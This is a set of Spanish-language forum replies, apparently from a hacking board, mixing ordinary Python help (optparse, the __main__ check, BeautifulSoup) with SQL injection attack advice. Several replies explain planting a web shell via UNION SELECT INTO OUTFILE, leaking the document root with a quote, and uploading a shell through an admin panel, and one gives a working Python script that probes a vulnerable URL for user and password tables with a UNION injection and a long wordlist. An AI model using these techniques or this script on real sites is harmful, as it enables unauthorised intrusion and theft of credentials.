si queres saber el valor de varias a la vez las concatenas...

Jaja es chiste no¿?
Como se supone que el que no sabe descargar de rapidshare se pueda bajar el manual si lo subiste a rapidshare xD

No necesariamente lo que si tenes que contar con permisos de lectura y escritura en la carpeta donde vas a escribir y ademas el usuario debe tener el privilegio FILE... despues de eso ya lo podes hacer tambien tenes que sacar el documentroot pero eso es facil con poner con pasarle una ' en donde estas inyectando te deberia mostrar todo el path ... (en la mayoria de los casos xD)
es dificil encontrar un server con dicha configuracion de mysql y php.....

podes probar hacer en la inyeccion un INTO + OUTFILE ... ejemplo: ->
UNION SELECT "codigo malicioso" INTO OUTFILE "PATH/shell.php"
para esto debes procurar que las magic_quotes no este habilitada asi no tienes problemas con las comillas ....

lo que vos decis es sacar la contraseña y usuario de un panel de administracion?
en ese caso te logueas y buscas un upload de imagenes o de lo que sea y uploadeas la shell haciendo un bypass si es necesario ....

Si usa Windows que se descargue el interprete o vos podes usar por ejemplo py2exe y lo convertis en un ejecutable para que pueda ejecutarlo sin tener el interprete instalado....
Si usa GNU/Linux (la mayoria de las distribuciones lo traen instalado) pasale el codigo que lo ponga cree un archivo .py pegue el codigo y lo ejecute ... ~$ python programa.py
xD no entiendo como andas programando en python y preguntes eso 

No, optparse de por si trata todos los argumentos como opcionales no puedes poner que tal parametro sea obligatorio y tales otros no... todos son opcionales... por ahi eh visto que tocando un poco el code de una clase de ese modulo podias ponerle vos esa opcion, pero ya de por si optparse no te brinda soporte para lo que quieres.
Igualmente tenes dentro del standar a getopt que me parece que si lo podes hacer en la documentacion oficial hay documentacion acerca de el...

Saludos

Esa comparacion es como si el modulo(donde este escrita) diga:
Si no eh sido importado hacer lo siguiente...

Yo diria que se deberia usar cuando haces un script que puede ser importado o no y se ejecute por si mismo....
por ejemplo imaginate que tienes un script con varias funciones y quieres que tu script pueda ser importado y las funciones puedan ser manejadas por otro modulo y quieres que tambien que si lo ejecutas directamente ejecute tal y tal funcion....
entonces pones el condicional.....
if __name__ == "__main__": #si me ejecuto directamente
      funcion1(arg1, arg2) #ejecutar funcion1
      funcion2()
      .....

si hicieras el programa para que solo se ejecute directamente y no sea necesario utilizarlo como modulo de importacion no es necesario usarlo ya que directamente para ejecutar tus propias funciones y usar tus propias clases dentro de tu script las llamas desde ahi, por ejemplo tienes
si este modulo es importado el interprete ejecutaria esa la sentencia "resultado = sumar(5, 7)" en el modulo que lo importo sin preguntarle si quiera al que lo importo si queria llamar a esa funcion....
entonces seria conveniente ponerle ese if ahi .... osea:

si el modulo es importado el valor del modulo deja de ser __main__ y pasa a ser el nombre del modulo por lo que si es importado la condicion no se cumple y por lo tanto no se ejecuta nuestra llamada a la funcion..

pd: tal vez no se note tanto el uso en el ejemplo de m... ese q puse pero creeme que es muy util ...

Saludos !

Un muy buen parser de html para python es BeautifulSoup para lo que pides es mas que suficiente 

bueno basicamente seria algo asi.... esta en python

import urllib2
 
url = raw_input("Introduce la url + el path vulnerable\n\tejemplo: www.ejemplo.com/xxxx.php?id=\n")
 
tablas = ['admin','tblUsers', 'tbl_users', 'tbl_admin',,'tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table',
'miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass',
'user_password', 'usua_login','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email',
'user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'u_password','nick','nicks','manager','managers','administrador',
'administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contraseña','auth','key','senha',
'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','tb_users','tb_user','tb_sys','sys',
'fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors',
'accounts','account','accnts','accnt','customers','customer','membres','administrateur','utilisateur','utilisateurs',
'password','passwords','amministratore','god','God','authors','autores','membername','usuario','Users','Admin','Members',
'Miemberos','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER', 'username', 'user_hash']
 
inyeccion = "-11+union+select+1,2,3,4,5,6,7+from+"
 
for tabla in tablas:
	web = urllib2.urlopen(url + inyeccion + tabla)
	source = web.read()
	error = "Table 'emotiu." + str(tabla) + "' doesn't exist"
	if not error in source:
		print "Tabla %s se encuentra en la base de datos" % tabla
 
print "Fin xd"
 
 

Por cierto la lista de tablas esa no es mia la saque de otro script que vi por ahi ....